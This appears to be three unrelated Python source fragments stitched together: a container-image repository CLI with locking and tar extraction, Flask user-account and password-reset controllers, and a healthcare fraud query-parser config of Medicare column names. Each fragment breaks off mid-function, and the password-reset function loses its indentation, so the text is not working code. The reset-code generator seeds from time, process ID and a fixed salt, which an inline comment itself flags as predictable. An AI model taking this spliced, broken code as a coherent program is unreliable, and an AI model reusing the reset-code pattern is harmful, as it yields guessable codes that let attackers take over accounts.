    bases.make_dir(_get_image_repo_path(), 0o750, bases.chown_app)
    bases.make_dir(_get_tags_path(), 0o750, bases.chown_app)
    bases.make_dir(_get_tmp_path(), 0o750, bases.chown_app)
    bases.make_dir(get_trees_path(), 0o750, bases.chown_app)
@argparses.begin_parser('build', **argparses.make_help_kwargs('build image'))
@argparses.argument(
    '--rootfs',
    type=Path,
    required=True,
    help='provide rootfs path',
)
@image_output_arguments
@argparses.end
def cmd_build_image(name, version, rootfs_path, output_path):
    """Build an image archive at ``output_path`` from an existing rootfs."""
    # Although root privilege is not required, most likely you need it
    # to finish this.
    ASSERT.predicate(rootfs_path, Path.is_dir)
    build_image(
        ImageMetadata(name=name, version=version),
        # build_image supplies the destination; we rsync the rootfs into it.
        lambda dst_path: bases.rsync_copy(rootfs_path, dst_path),
        output_path,
    )
@argparses.begin_parser(
    'import', **argparses.make_help_kwargs('import an image archive')
)
@argparses.argument(
    '--tag', type=models.validate_image_tag, help='provide new image tag'
)
@argparses.argument(
    'path', type=Path, help='import image archive from this path'
)
@argparses.end
def cmd_import(image_archive_path, *, tag=None):
    """Import an image archive into the repo.

    This is a no-op if the image has been imported (i.e., an image in
    the repo has the same ID).

    For images having the same name and version, it is an error to have
    different IDs.
    """
    oses.assert_root_privilege()
    ASSERT.predicate(image_archive_path, Path.is_file)
    with _using_tmp() as tmp_path:
        # Extraction happens before any repo locks are taken; only the
        # final move into trees/ is done under lock.
        image_id = _extract_image(image_archive_path, tmp_path)
        LOG.info('import image id: %s', image_id)
        _setup_image_dir(tmp_path)
        # Make sure that for every newly-imported image, its last
        # updated time is set to now; or else it could be cleaned up
        # right after import.
        _touch_image_dir(tmp_path)
        with contextlib.ExitStack() as stack:
            if tag:
                # Lock order: tags before trees (alphabetical), per the
                # module-level locking note.
                stack.enter_context(
                    locks.acquiring_exclusive(_get_tags_path())
                )
            stack.enter_context(locks.acquiring_exclusive(get_trees_path()))
            if not _maybe_import_image_dir(tmp_path, image_id):
                # Image already present; nothing more to do.
                return
            if tag:
                image_dir_path = get_image_dir_path(image_id)
                try:
                    _tag_image(tag, image_dir_path)
                except:
                    # Roll back the import so a tag-only request does not
                    # leave an untagged image behind; then re-raise.
                    LOG.error('cannot tag image; revert import')
                    if not _maybe_remove_image_dir(image_dir_path):
                        LOG.error('cannot revert import')
                    raise
# All columns cmd_list can emit.
_IMAGE_LIST_COLUMNS = frozenset((
    'id',
    'name',
    'version',
    'tags',
    'ref-count',
    'last-updated',
    'rootfs',
))
# Columns shown when the user does not request specific ones.
_IMAGE_LIST_DEFAULT_COLUMNS = (
    'id',
    'name',
    'version',
    'tags',
    'ref-count',
    'last-updated',
)
# How non-string cell values are rendered in columnar output.
IMAGE_LIST_STRINGIFIERS = {
    'tags': ' '.join,
    'last-updated': datetime.datetime.isoformat,
}
# Sanity checks: defaults and stringifiers must only name known columns.
ASSERT.issuperset(_IMAGE_LIST_COLUMNS, _IMAGE_LIST_DEFAULT_COLUMNS)
ASSERT.issuperset(_IMAGE_LIST_COLUMNS, IMAGE_LIST_STRINGIFIERS)
@argparses.begin_parser('list', **argparses.make_help_kwargs('list images'))
@columns_argparses.columnar_arguments(
    _IMAGE_LIST_COLUMNS, _IMAGE_LIST_DEFAULT_COLUMNS
)
@argparses.end
def cmd_list():
    """Yield one dict (keyed by _IMAGE_LIST_COLUMNS) per image in the repo."""
    # Don't need root privilege here.
    # Shared (read) locks: listing must not race with removal/cleanup.
    with locks.acquiring_shared(_get_tags_path()), \
            locks.acquiring_shared(get_trees_path()):
        for image_dir_path, metadata in _iter_metadatas():
            image_id = _get_id(image_dir_path)
            last_updated = _get_last_updated(image_dir_path)
            yield {
                'id': image_id,
                'name': metadata.name,
                'version': metadata.version,
                'tags': _find_tags(image_id),
                'ref-count': _get_ref_count(image_dir_path),
                'last-updated': last_updated,
                'rootfs': get_rootfs_path(image_dir_path),
            }
@argparses.begin_parser(
    'tag', **argparses.make_help_kwargs('set tag to an image')
)
@select_image_arguments
@argparses.argument(
    'new_tag', type=models.validate_image_tag, help='provide new image tag'
)
@argparses.end
def cmd_tag(*, image_id=None, name=None, version=None, tag=None, new_tag):
    """Point ``new_tag`` at the image selected by id, name/version, or tag."""
    oses.assert_root_privilege()
    # Tags are modified (exclusive) while trees are only read (shared);
    # tags are locked first, per the module-level lock-ordering note.
    with locks.acquiring_exclusive(_get_tags_path()):
        with locks.acquiring_shared(get_trees_path()):
            # It is an error to tag a nonexistent image.
            image_dir_path = ASSERT.not_none(
                _find_image_dir_path(image_id, name, version, tag)
            )
            _tag_image(new_tag, image_dir_path)
@argparses.begin_parser(
    'remove-tag', **argparses.make_help_kwargs('remove tag from an image')
)
@argparses.argument(
    'tag',
    type=models.validate_image_tag,
    help='provide image tag for removal',
)
@argparses.end
def cmd_remove_tag(tag):
    """Delete the given tag; no-op if the tag does not exist."""
    oses.assert_root_privilege()
    with locks.acquiring_exclusive(_get_tags_path()):
        # A missing tag is not an error -- removal is idempotent.
        with contextlib.suppress(FileNotFoundError):
            _get_tag_path(tag).unlink()
@argparses.begin_parser(
    'remove',
    **argparses.make_help_kwargs('remove an image from the repository'),
)
@argparses.argument(
    '--skip-active',
    action=argparses.StoreBoolAction,
    default=False,
    help='skip removing active image (default: %(default_string)s)',
)
@select_image_arguments
@argparses.end
def cmd_remove(
    *, image_id=None, name=None, version=None, tag=None, skip_active=False
):
    """Remove an image, or no-op if image does not exist."""
    oses.assert_root_privilege()
    with locks.acquiring_exclusive(_get_tags_path()), \
            locks.acquiring_exclusive(get_trees_path()):
        image_dir_path = _find_image_dir_path(image_id, name, version, tag)
        if not image_dir_path:
            LOG.debug(
                'image does not exist: image_id=%s, nv=%s:%s, tag=%s',
                image_id, name, version, tag
            )
            return
        removed = _maybe_remove_image_dir(image_dir_path)
        # Removal may be refused (e.g. image still in use); that is only
        # acceptable when --skip-active was given.
        ASSERT.true(removed or skip_active)
@argparses.begin_parser(
    'cleanup', **argparses.make_help_kwargs('clean up image repository')
)
@bases.grace_period_arguments
@argparses.end
def cmd_cleanup(expiration):
    """Clean up the image repository.

    Removes stale temporary entries, images last updated before
    ``expiration``, and any tags left dangling afterwards.
    """
    oses.assert_root_privilege()
    # Temporary entries can be reaped independently of trees/tags.
    with locks.acquiring_exclusive(_get_tmp_path()):
        _cleanup_tmp()
    # Clean trees before tags so that tags left dangling by image
    # removal are pruned in the same pass.
    with locks.acquiring_exclusive(_get_tags_path()), \
            locks.acquiring_exclusive(get_trees_path()):
        _cleanup_trees(expiration)
        _cleanup_tags()
#
# Locking strategy.
#
@contextlib.contextmanager
def _using_tmp():
    """Yield a fresh, exclusively-locked temporary directory.

    The directory is created under the repo tmp area while holding an
    exclusive lock on that area, then individually locked so that
    ``_cleanup_tmp`` (which only removes directories it can lock) will
    not reap it while in use.  Both the directory and its lock are
    always cleaned up, whether setup fails or the caller finishes.
    """
    tmp_dir_path = _get_tmp_path()
    tmp_path = None
    tmp_lock = None
    with locks.acquiring_exclusive(tmp_dir_path):
        try:
            tmp_path = Path(tempfile.mkdtemp(dir=tmp_dir_path))
            tmp_lock = locks.FileLock(tmp_path)
            tmp_lock.acquire_exclusive()
        except:
            # Undo whichever of the setup steps succeeded, then re-raise.
            if tmp_path:
                g1.files.remove(tmp_path)
            if tmp_lock:
                tmp_lock.release()
                tmp_lock.close()
            raise
    try:
        yield tmp_path
    finally:
        # Remove the directory before releasing its lock so no cleaner
        # can grab the path in between.
        g1.files.remove(tmp_path)
        tmp_lock.release()
        tmp_lock.close()
#
# Repo layout.
#
# Top-level subdirectory names of the image repository.
_IMAGES = 'images'
_TAGS = 'tags'
_TREES = 'trees'
_TMP = 'tmp'
# Entries inside each per-image directory.
_METADATA = 'metadata'
_ROOTFS = 'rootfs'
def _get_image_repo_path():
    """Return the root directory of the image repository."""
    return bases.get_repo_path() / _IMAGES
def _get_tags_path():
    """Return the directory holding tag symlinks."""
    return _get_image_repo_path() / _TAGS
def get_trees_path():
    """Return the directory holding per-image directories."""
    return _get_image_repo_path() / _TREES
def _get_tmp_path():
    """Return the directory for temporary working directories."""
    return _get_image_repo_path() / _TMP
def get_image_dir_path(image_id):
    """Return the image directory for a (validated) image id."""
    return get_trees_path() / models.validate_image_id(image_id)
def _get_id(image_dir_path):
    """Return the image id encoded in the image directory's name."""
    return models.validate_image_id(image_dir_path.name)
def _get_metadata_path(image_dir_path):
    """Return the path of an image directory's metadata file."""
    return image_dir_path / _METADATA
def get_rootfs_path(image_dir_path):
    """Return the path of an image directory's rootfs."""
    return image_dir_path / _ROOTFS
def _get_tag_path(tag):
    """Return the symlink path for a (validated) tag."""
    return _get_tags_path() / models.validate_image_tag(tag)
def _get_tag(tag_path):
    """Return the tag name encoded in a tag symlink's name."""
    return models.validate_image_tag(tag_path.name)
def _get_tag_target(image_dir_path):
    """Return the relative symlink target pointing at the image dir."""
    return Path('..') / _TREES / _get_id(image_dir_path)
#
# Functions below require caller acquiring locks.
#
#
# Top-level directories.
#
def _cleanup_tmp():
    """Remove stray files and all unlocked temporary directories."""
    for tmp_path in _get_tmp_path().iterdir():
        if not tmp_path.is_dir():
            LOG.info('remove unknown temporary file: %s', tmp_path)
            tmp_path.unlink()
            continue
        # A directory we cannot lock is still in use (see _using_tmp);
        # leave it alone.
        tmp_lock = locks.try_acquire_exclusive(tmp_path)
        if not tmp_lock:
            continue
        try:
            LOG.info('remove temporary directory: %s', tmp_path)
            shutil.rmtree(tmp_path)
        finally:
            tmp_lock.release()
            tmp_lock.close()
def _cleanup_trees(expiration):
    """Remove images whose last-updated time precedes ``expiration``."""
    LOG.info('remove images before: %s', expiration)
    for entry in get_trees_path().iterdir():
        if not entry.is_dir():
            # Only image directories belong here; anything else is junk.
            LOG.info('remove unknown file under trees: %s', entry)
            entry.unlink()
        elif _get_last_updated(entry) < expiration:
            _maybe_remove_image_dir(entry)
def _cleanup_tags():
    """Drop dangling tag symlinks and any non-symlink entries."""
    for tag_path in _get_tags_path().iterdir():
        if not tag_path.is_symlink():
            # Only tag symlinks belong here; anything else is junk.
            LOG.info('remove unknown file under tags: %s', tag_path)
            g1.files.remove(tag_path)
        elif not tag_path.resolve().exists():
            LOG.info('remove dangling tag: %s', tag_path)
            tag_path.unlink()
#
# Image builder.
#
def build_image(metadata, make_rootfs, output_path):
    """Build an image archive (gzipped tar) at ``output_path``.

    ``make_rootfs`` is called with the staging rootfs path to populate it.
    """
    ASSERT.not_predicate(output_path, g1.files.lexists)
    # Stage the contents in a sibling temp directory so the archive
    # members are simply `metadata` and `rootfs`.
    with tempfile.TemporaryDirectory(
        dir=output_path.parent,
        prefix=output_path.name + '-',
    ) as staging_dir:
        staging_path = Path(staging_dir)
        _write_metadata(metadata, staging_path)
        make_rootfs(get_rootfs_path(staging_path))
        _setup_image_dir(staging_path)
        tar_argv = [
            'tar',
            '--create',
            '--file', output_path,
            '--gzip',
            '--directory', staging_path,
            _METADATA,
            _ROOTFS,
        ]
        scripts.run(tar_argv)
#
# Image extraction.
#
def _extract_image(archive_path, dst_dir_path):
    """Extract an image archive into ``dst_dir_path``.

    Returns the SHA-256 hex digest of the decompressed tar stream (the
    same bytes that are piped into ``tar``), computed in one pass while
    extracting.
    """
    # We assume archive is always gzip-compressed for now.
    hasher = hashlib.sha256()
    # If we are running as root, we can and should preserve the
    # original owners and permissions.
    i_am_root = oses.has_root_privilege()
    # TODO: Should we use stdlib's tarfile rather than calling tar?
    with scripts.using_stdin(subprocess.PIPE), scripts.popen([
        'tar',
        '--extract',
        *('--file', '-'),
        *('--directory', dst_dir_path),
        *(('--same-owner', '--same-permissions') if i_am_root else ()),
    ]) as proc:
        try:
            # Stream decompressed bytes to tar's stdin, hashing as we go.
            with gzip.open(archive_path, 'rb') as archive:
                while True:
                    data = archive.read(4096)
                    if not data:
                        break
                    proc.stdin.write(data)
                    hasher.update(data)
        except:
            proc.kill()
            raise
        else:
            # Close stdin so tar sees EOF, then wait for a clean exit.
            proc.stdin.close()
            proc.wait()
    ASSERT.equal(proc.poll(), 0)
    return hasher.hexdigest()
def _setup_image_dir(image_dir_path):
    """Fix permissions and ownership of an image directory's entries."""
    entries = (
        (image_dir_path, 0o750, bases.chown_app),
        (_get_metadata_path(image_dir_path), 0o640, bases.chown_app),
        (get_rootfs_path(image_dir_path), 0o755, bases.chown_root),
    )
    for path, mode, chown in entries:
        bases.setup_file(path, mode, chown)
#
# Image directories.
#
def _maybe_import_image_dir(src_path, image_id):
    """Move ``src_path`` into the trees directory.

    Returns False (without importing) when an image with the same id
    already exists, True otherwise.
    """
    image_dir_path = get_image_dir_path(image_id)
    if image_dir_path.exists():
        LOG.warning('not import duplicated image: %s', image_id)
        return False
    _assert_unique_name_and_version(read_metadata(src_path))
    src_path.rename(image_dir_path)
    return True
def _assert_unique_name_and_version(new_metadata):
    """Assert no existing image shares the new image's name and version."""
    for image_dir_path, metadata in _iter_metadatas():
        is_duplicate = (
            new_metadata.name == metadata.name
            and new_metadata.version == metadata.version
        )
        ASSERT(
            not is_duplicate,
            'expect unique image name and version: {}, {}',
            image_dir_path,
            new_metadata,
        )
def _iter_image_dir_paths():
    """Yield image directories, logging any stray non-directory files."""
    for entry in get_trees_path().iterdir():
        if entry.is_dir():
            yield entry
        else:
            LOG.debug('encounter unknown file under trees: %s', entry)
def _find_image_dir_path(image_id, name, version, tag):
"""Return path to image directory or None if not found."""
ASSERT.only_one((image_id, name or | |
"""
Public controllers for the User Account module.
This file is subject to the terms and conditions defined in file 'LICENSE',
which is part of this source code package.
"""
# pylint: disable=no-member
import re
from datetime import datetime, timedelta
import time
import os
import hashlib
import bcrypt
from flask import jsonify, request, g, current_app
from marshmallow import ValidationError
from init_dep import db
from lib.schema.validate import unique, unique_email, exists
from lib.random import String as RandomString
from modules.users.model import User, UserTermsOfService, UserPasswordHistory
from modules.user_profiles.model import UserProfile
from modules.roles.model import Role
from modules.terms_of_services.model import TermsOfService
from modules.password_resets.model import PasswordReset
from modules.notifications.notify import Notify
from .schema_public import UserAccountSchema
def post_user_account_step1():
    """User registration step 1.

    Validates username/email uniqueness, terms-of-service acceptance, and
    that the two submitted passwords match; on success creates the user
    (with the USER role), records the ToS acceptance, and seeds the
    password history.

    :returns: JSON string of the user's account information; status code
    :rtype: (str, int)
    """
    # pre-validate data
    errors = unique({}, User, User.username,
                    str(request.json.get('username')).lower().strip()
                    if request.json.get('username', None) else None)
    errors = unique_email(errors, User, User.email,
                          str(request.json.get('email')).lower().strip()
                          if request.json.get('email', None) else None)
    errors, tos = exists(errors, TermsOfService, 'tos_id',
                         request.json.get('tos_id', None),
                         missing_error="Please agree to the terms of service.")
    if (request.json.get('password', None) and
            request.json.get('password2', None)):
        if request.json.get('password') != request.json.get('password2'):
            errors['password2'] = ["Passwords must match."]
    # validate data
    try:
        data = UserAccountSchema(
            exclude=('first_name', 'last_name',)).load(request.json)
    except ValidationError as err:
        errors = dict(list(errors.items()) + list(err.messages.items()))
    # return any errors
    if errors:
        return jsonify({"error": errors}), 400
    # save user
    user = User(username=data['username'].lower().strip(),
                email=data['email'].lower().strip(),
                password=data['password'],
                is_verified=False,
                status=User.STATUS_ENABLED,
                status_changed_at=datetime.now())
    user_role = Role.query.filter(Role.name == 'USER').first()
    if user_role:
        user.roles.append(user_role)
    db.session.add(user)
    # save user terms of service
    user_tos = UserTermsOfService(
        user=user,
        terms_of_service=tos,
        accept_date=datetime.now(),
        ip_address=request.environ.get('HTTP_X_REAL_IP', request.remote_addr))
    db.session.add(user_tos)
    # save password history
    # NOTE(review): history stores the user's stored (hashed) password --
    # assumes the User model hashes `password` on assignment, as implied by
    # bcrypt.checkpw() against history records in put_password; confirm.
    pass_history = UserPasswordHistory(
        user=user,
        password=user.password,
        set_date=datetime.now())
    db.session.add(pass_history)
    db.session.commit()
    # prep output (profile fields are not set until step 2)
    output = {
        'id': user.id,
        'username': user.username,
        'email': user.email,
        'password_changed_at': user.password_changed_at,
        'is_verified': user.is_verified,
        'first_name': None,
        'last_name': None,
        'joined_at': None,
    }
    # response
    return jsonify(
        {'user_account': UserAccountSchema().dump(output)}), 201
def post_user_account_step2():
    """User registration step 2.

    Creates or updates the authenticated user's profile (first/last name).

    :returns: JSON string of the user's account information; status code
    :rtype: (str, int)
    """
    # get user
    user = g.user
    # validate data; step 2 accepts only the profile fields
    try:
        data = UserAccountSchema(
            exclude=('username', 'email', 'password', 'password2', 'tos_id',)
        ).load(request.json)
    except ValidationError as err:
        return jsonify({"error": err.messages}), 400
    # save user profile
    user_profile = user.profile if user.profile else None
    if user_profile:
        user_profile.first_name = data['first_name'].strip()
        user_profile.last_name = data['last_name'].strip()
    else:
        user_profile = UserProfile(
            user_id=user.id,
            first_name=data['first_name'].strip(),
            last_name=data['last_name'].strip(),
            joined_at=datetime.now(),
            status=UserProfile.STATUS_ENABLED,
            status_changed_at=datetime.now())
        db.session.add(user_profile)
    db.session.commit()
    # prep output
    output = {
        'id': user.id,
        'username': user.username,
        'email': user.email,
        'password_changed_at': user.password_changed_at,
        'is_verified': user.is_verified,
        'first_name': user_profile.first_name,
        'last_name': user_profile.last_name,
        'joined_at': user_profile.joined_at,
    }
    # response
    return jsonify(
        {'user_account': UserAccountSchema().dump(output)}), 201
def get_user_account():
    """Retrieves user's account information.

    :returns: JSON string of the user's account information; status code
    :rtype: (str, int)
    """
    user = g.user
    profile = user.profile
    account = {
        'id': user.id,
        'username': user.username,
        'email': user.email,
        'password_changed_at': user.password_changed_at,
        'is_verified': user.is_verified,
        # profile fields may not exist yet (registration step 2 pending)
        'first_name': profile.first_name if profile else None,
        'last_name': profile.last_name if profile else None,
        'joined_at': profile.joined_at if profile else None,
    }
    body = {'user_account': UserAccountSchema().dump(account)}
    return jsonify(body), 200
def put_user_account():
    """Updates the current user's account information.

    Re-validates username/email uniqueness (excluding the user itself) and
    updates the user record plus their profile, creating the profile if it
    does not yet exist.

    :returns: JSON string of the user's account information; status code
    :rtype: (str, int)
    """
    # init vars
    user = g.user
    user_profile = user.profile if user.profile else None
    # pre-validate data
    errors = unique({}, User, User.username,
                    str(request.json.get('username')).lower().strip()
                    if request.json.get('username', None) else None,
                    update=user)
    errors = unique_email(errors, User, User.email,
                          str(request.json.get('email')).lower().strip()
                          if request.json.get('email', None) else None,
                          update=user)
    # validate data (password changes go through put_password instead)
    try:
        data = UserAccountSchema(
            exclude=('password', 'password2', 'tos_id',)).load(request.json)
    except ValidationError as err:
        errors = dict(list(errors.items()) + list(err.messages.items()))
    # return any errors
    if errors:
        return jsonify({"error": errors}), 400
    # save user
    user.username = data['username'].lower().strip()
    user.email = data['email'].lower().strip()
    # save user profile
    if user_profile:
        user_profile.first_name = data['first_name'].strip()
        user_profile.last_name = data['last_name'].strip()
    else:
        user_profile = UserProfile(
            user_id=user.id,
            first_name=data['first_name'].strip(),
            last_name=data['last_name'].strip(),
            joined_at=datetime.now(),
            status=UserProfile.STATUS_ENABLED,
            status_changed_at=datetime.now())
        db.session.add(user_profile)
    db.session.commit()
    # prep output
    output = {
        'id': user.id,
        'username': user.username,
        'email': user.email,
        'password_changed_at': user.password_changed_at,
        'is_verified': user.is_verified,
        'first_name': user_profile.first_name if user_profile else None,
        'last_name': user_profile.last_name if user_profile else None,
        'joined_at': user_profile.joined_at if user_profile else None,
    }
    # response
    return jsonify(
        {'user_account': UserAccountSchema().dump(output)}), 200
def delete_user_account():
    """Sets the current user's account to `deleted` status (soft delete).

    :returns: empty response body; status code
    :rtype: (str, int)
    """
    # get user
    user = g.user
    # soft-delete the user record
    user.status = User.STATUS_DELETED
    user.status_changed_at = datetime.now()
    # soft-delete the user profile, if one exists
    if user.profile:
        user.profile.status = UserProfile.STATUS_DELETED
        user.profile.status_changed_at = datetime.now()
    db.session.commit()
    # response
    return '', 204
def put_password():
    """Updates the current user's password.

    Requires the previous password, a sufficiently complex new password
    entered twice, and (if the user's role enforces a password policy)
    that the new password was not recently used.

    :returns: JSON string of a `true` value; status code
    :rtype: (str, int)
    """
    # pylint: disable=too-many-branches
    # get user
    user = g.user
    # prep regex
    re_password = re.compile(UserAccountSchema.re_password)
    # validate data
    errors = {}
    if ('previous_password' not in request.json or
            not request.json['previous_password']):
        if 'previous_password' not in errors:
            errors['previous_password'] = []
        errors['previous_password'].append("Missing data for required field.")
    elif ('previous_password' in request.json and
            not user.check_password(request.json['previous_password'])):
        if 'previous_password' not in errors:
            errors['previous_password'] = []
        errors['previous_password'].append("Incorrect password.")
    if 'password1' not in request.json or not request.json['password1']:
        if 'password1' not in errors:
            errors['password1'] = []
        errors['password1'].append("Missing data for required field.")
    if ('password1' in request.json and
            not re_password.match(request.json['password1'])):
        if 'password1' not in errors:
            errors['password1'] = []
        errors['password1'].append("Please choose a more complex password.")
    if 'password2' not in request.json or not request.json['password2']:
        if 'password2' not in errors:
            errors['password2'] = []
        errors['password2'].append("Missing data for required field.")
    if 'password1' in request.json and 'password2' in request.json:
        if request.json['password1'] != request.json['password2']:
            if 'password2' not in errors:
                errors['password2'] = []
            errors['password2'].append("New passwords must match.")
    if errors:
        return jsonify({"error": errors}), 400
    # check previous passwords against the role's reuse policy
    if user.roles[0].password_policy and user.roles[0].password_reuse_history:
        prev_passwords = UserPasswordHistory.query.\
            filter(UserPasswordHistory.user_id == user.id).\
            order_by(UserPasswordHistory.set_date.desc()).\
            limit(user.roles[0].password_reuse_history)
        for record in prev_passwords:
            if bcrypt.checkpw(request.json.get('password1').encode('utf-8'),
                              record.password.encode('utf-8')):
                errors['password1'] = ["This password has recently been used."]
                break
        if errors:
            return jsonify({"error": errors}), 400
    # save user and password history
    # NOTE(review): assumes the User model hashes `password` on assignment,
    # so the history record stores the bcrypt hash compared above; confirm.
    user.password = request.json.get('password1')
    pass_history = UserPasswordHistory(user=user,
                                       password=user.password,
                                       set_date=datetime.now())
    db.session.add(pass_history)
    db.session.commit()
    # response
    return jsonify({'success': 'true'}), 200
def post_password_request_reset_code():
    """Creates a password reset code for the given email, sent via email.

    :returns: JSON string of a `true` value and whether the notification
        was sent; status code
    :rtype: (str, int)
    """
    # initialize user
    user = None
    # validate data
    errors = {}
    if 'email' not in request.json or not request.json['email']:
        if 'email' not in errors:
            errors['email'] = []
        errors['email'].append("Missing data for required field.")
    if request.json.get('email'):
        # Build a throwaway User only to reuse its email-digest logic for
        # the lookup -- presumably emails are stored digested; confirm
        # against the User model.
        temp_user = User(email=request.json.get('email'))
        if temp_user:
            user = User.query.filter(
                User.status == User.STATUS_ENABLED,
                User.roles.any(Role.id == 1),
                User.email_digest == temp_user.email_digest).first()
            if not user:
                if 'email' not in errors:
                    errors['email'] = []
                errors['email'].append("Email address not found.")
    if errors:
        return jsonify({"error": errors}), 400
    # generate random seed
    # NOTE(review): sha256(time + pid + salt) is predictable rather than
    # cryptographically strong; consider the `secrets` module for reset
    # codes.
    now = datetime.now()
    unixtime = time.mktime(now.timetuple())
    hash_object = hashlib.sha256(
        (str(unixtime) + str(os.getpid()) +
         User.CRYPT_DIGEST_SALT).encode('utf-8'))
    random_seed = hash_object.hexdigest()
    # save reset request
    password_reset = PasswordReset(
        user_id=user.id,
        code=RandomString.user_code(8, random_seed),
        is_used=False,
        requested_at=datetime.now(),
        ip_address=request.environ.get('HTTP_X_REAL_IP', request.remote_addr),
        status=PasswordReset.STATUS_ENABLED,
        status_changed_at=datetime.now()
    )
    db.session.add(password_reset)
    db.session.commit()
    # email notification
    notify = Notify(current_app.config['ENV'], db)
    response = notify.send(
        user,
        Notify.CHANNEL_EMAIL,
        'password-reset-code',
        name=user.profile.first_name if user.profile else 'User',
        code=password_reset.code)
    # response
    return jsonify({'success': 'true', 'sent': response}), 201
def put_password_reset():
"""Updates the current user's password using a reset code.
:returns: JSON string of a `true` value; status code
:rtype: (str, int)
"""
# pylint: disable=too-many-branches
# initialize user
user = None
# prep regex
re_password = re.compile(UserAccountSchema.re_password)
# validate data
errors = {}
if 'code' not in request.json or not request.json['code']:
if 'code' not in errors:
errors['code'] = []
errors['code'].append("Missing data for required field.")
if 'email' not in request.json or not request.json['email']:
if 'email' not in errors:
errors['email'] = []
errors['email'].append("Missing data for required field.")
if request.json.get('email'):
temp_user = User(email=request.json.get('email'))
if temp_user:
user = User.query.filter(
User.status == User.STATUS_ENABLED,
User.roles.any(Role.id == 1),
User.email_digest == temp_user.email_digest).first()
if not user:
if 'email' not in errors:
errors['email'] = []
errors['email'].append("Email address not found.")
if user and request.json.get('code'):
password_reset = PasswordReset.query.filter(
PasswordReset.status == PasswordReset.STATUS_ENABLED,
PasswordReset.code == request.json.get('code'),
PasswordReset.user_id == user.id,
PasswordReset.is_used == False, # noqa; pylint: disable=singleton-comparison
(PasswordReset.requested_at +
timedelta(seconds=3600)) >= datetime.now()
).first()
if not password_reset:
if 'code' not in errors:
errors['code'] = []
errors['code'].append("Invalid reset code.")
if 'password1' not in request.json or not request.json['password1']:
if 'password1' not in errors:
errors['password1'] = []
errors['password1'].append("Missing data for required field.")
if ('password1' in request.json and
not re_password.match(request.json['password1'])):
if 'password1' not in errors:
errors['password1'] = []
errors['password1'].append("Please choose a more complex password.")
if 'password2' not in request.json or not request.json['password2']:
if 'password2' not in errors:
errors['password2'] = []
errors['password2'].append("Missing data for required field.")
if | |
"""
Copyright (C) 2010 - 2013 TopCoder Inc., All Rights Reserved.
This module specifies configurable details of the parser including
numerical/logical/textual attribute names and CMS codes, numerical
operators, digits, and characters.
This module also specifies how numerical operators are translated to SQL.
@version 1.0 (Healthcare Fraud Prevention - Query Parsing and Query Generation)
@author: TCSASSEMBLER
"""
class ParserConfig:
"""
The Parser class should extend this class to access specified configuration.
"""
# Edit numerical_attributes to adapt to new set of numerical attributes.
numerical_attributes = [
# Beneficiaries
("'End stage renal disease Indicator'", "BENE_ESRD_IND"),
("'Date of Birth'", "BENE_BIRTH_DT"),
("'Date of Death'", "BENE_DEATH_DT"),
("'Sex'", "BENE_SEX_IDENT_CD"),
("'Beneficiary Race Code'", "BENE_RACE_CD"),
("'Total number of months of part A coverage for the beneficiary'", "BENE_HI_CVRAGE_TOT_MONS"),
("'Total number of months of part B coverage for the beneficiary'", "BENE_SMI_CVRAGE_TOT_MONS"),
("'Total number of months of HMO coverage for the beneficiary'", "BENE_HMO_CVRAGE_TOT_MONS"),
("'Total number of months of part D plan coverage for the beneficiary'", "PLAN_CVRG_MOS_NUM"),
("'Inpatient annual Medicare reimbursement amount'", "MEDREIMB_IP"),
("'Inpatient annual beneficiary responsibility amount'", "BENRES_IP"),
("'Inpatient annual primary payer reimbursement amount'", "PPPYMT_IP"),
("'Outpatient annual Medicare reimbursement amount'", "MEDREIMB_OP"),
("'Outpatient annual beneficiary responsibility amount'", "BENRES_OP"),
("'Outpatient annual primary payer reimbursement amount'", "PPPYMT_OP"),
("'Carrier annual Medicare reimbursement amount'", "MEDREIMB_CAR"),
("'Carrier annual beneficiary responsibility amount'", "BENRES_CAR"),
("'Carrier annual primary payer reimbursement amount'", "PPPYMT_CAR"),
# Carriers
("'Claim start date'", "CLM_FROM_DT"),
("'Claim end date'", "CLM_THRU_DT"),
("'Line NCH Payment Amount 1'", "LINE_NCH_PMT_AMT_1"),
("'Line NCH Payment Amount 2'", "LINE_NCH_PMT_AMT_2"),
("'Line NCH Payment Amount 3'", "LINE_NCH_PMT_AMT_3"),
("'Line NCH Payment Amount 4'", "LINE_NCH_PMT_AMT_4"),
("'Line NCH Payment Amount 5'", "LINE_NCH_PMT_AMT_5"),
("'Line NCH Payment Amount 6'", "LINE_NCH_PMT_AMT_6"),
("'Line NCH Payment Amount 7'", "LINE_NCH_PMT_AMT_7"),
("'Line NCH Payment Amount 8'", "LINE_NCH_PMT_AMT_8"),
("'Line NCH Payment Amount 9'", "LINE_NCH_PMT_AMT_9"),
("'Line NCH Payment Amount 10'", "LINE_NCH_PMT_AMT_10"),
("'Line NCH Payment Amount 11'", "LINE_NCH_PMT_AMT_11"),
("'Line NCH Payment Amount 12'", "LINE_NCH_PMT_AMT_12"),
("'Line NCH Payment Amount 13'", "LINE_NCH_PMT_AMT_13"),
("'Line Beneficiary Part B Deductible Amount 1'", "LINE_BENE_PTB_DDCTBL_AMT_1"),
("'Line Beneficiary Part B Deductible Amount 2'", "LINE_BENE_PTB_DDCTBL_AMT_2"),
("'Line Beneficiary Part B Deductible Amount 3'", "LINE_BENE_PTB_DDCTBL_AMT_3"),
("'Line Beneficiary Part B Deductible Amount 4'", "LINE_BENE_PTB_DDCTBL_AMT_4"),
("'Line Beneficiary Part B Deductible Amount 5'", "LINE_BENE_PTB_DDCTBL_AMT_5"),
("'Line Beneficiary Part B Deductible Amount 6'", "LINE_BENE_PTB_DDCTBL_AMT_6"),
("'Line Beneficiary Part B Deductible Amount 7'", "LINE_BENE_PTB_DDCTBL_AMT_7"),
("'Line Beneficiary Part B Deductible Amount 8'", "LINE_BENE_PTB_DDCTBL_AMT_8"),
("'Line Beneficiary Part B Deductible Amount 9'", "LINE_BENE_PTB_DDCTBL_AMT_9"),
("'Line Beneficiary Part B Deductible Amount 10'", "LINE_BENE_PTB_DDCTBL_AMT_10"),
("'Line Beneficiary Part B Deductible Amount 11'", "LINE_BENE_PTB_DDCTBL_AMT_11"),
("'Line Beneficiary Part B Deductible Amount 12'", "LINE_BENE_PTB_DDCTBL_AMT_12"),
("'Line Beneficiary Part B Deductible Amount 13'", "LINE_BENE_PTB_DDCTBL_AMT_13"),
("'Line Beneficiary Primary Payer Paid Amount 1'", "LINE_BENE_PRMRY_PYR_PD_AMT_1"),
("'Line Beneficiary Primary Payer Paid Amount 2'", "LINE_BENE_PRMRY_PYR_PD_AMT_2"),
("'Line Beneficiary Primary Payer Paid Amount 3'", "LINE_BENE_PRMRY_PYR_PD_AMT_3"),
